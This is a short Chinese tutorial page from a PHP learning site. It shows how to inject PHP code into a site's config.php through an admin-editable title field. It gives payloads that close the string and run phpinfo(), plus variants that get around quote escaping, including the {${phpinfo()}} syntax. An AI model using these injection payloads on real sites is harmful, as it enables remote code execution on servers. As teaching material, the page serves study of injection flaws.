来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 一网站config.php原本为:?php //设定title $std_title = 123 ? 这个123是可以在后台控制的。于是我去闭合他。将123变成123??php phpinfo();die();?//如果不转义的情况下,上面是ok的如果只转义了......
|
一网站config.php原本为:
<?php //设定title $std_title = "123" ?> 这个123是可以在后台控制的。于是我去闭合他。将123变成123"?><?php phpinfo();die();?>//
如果不转义的情况下,上面是ok的
如果只转义了"变成 \"
可以使用123\"?><?php phpinfo();die();?>//
如果使用\"被转义成\\\"
可以尝试
{${phpinfo()}}
则
$std_title="{${phpinfo()}}"
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
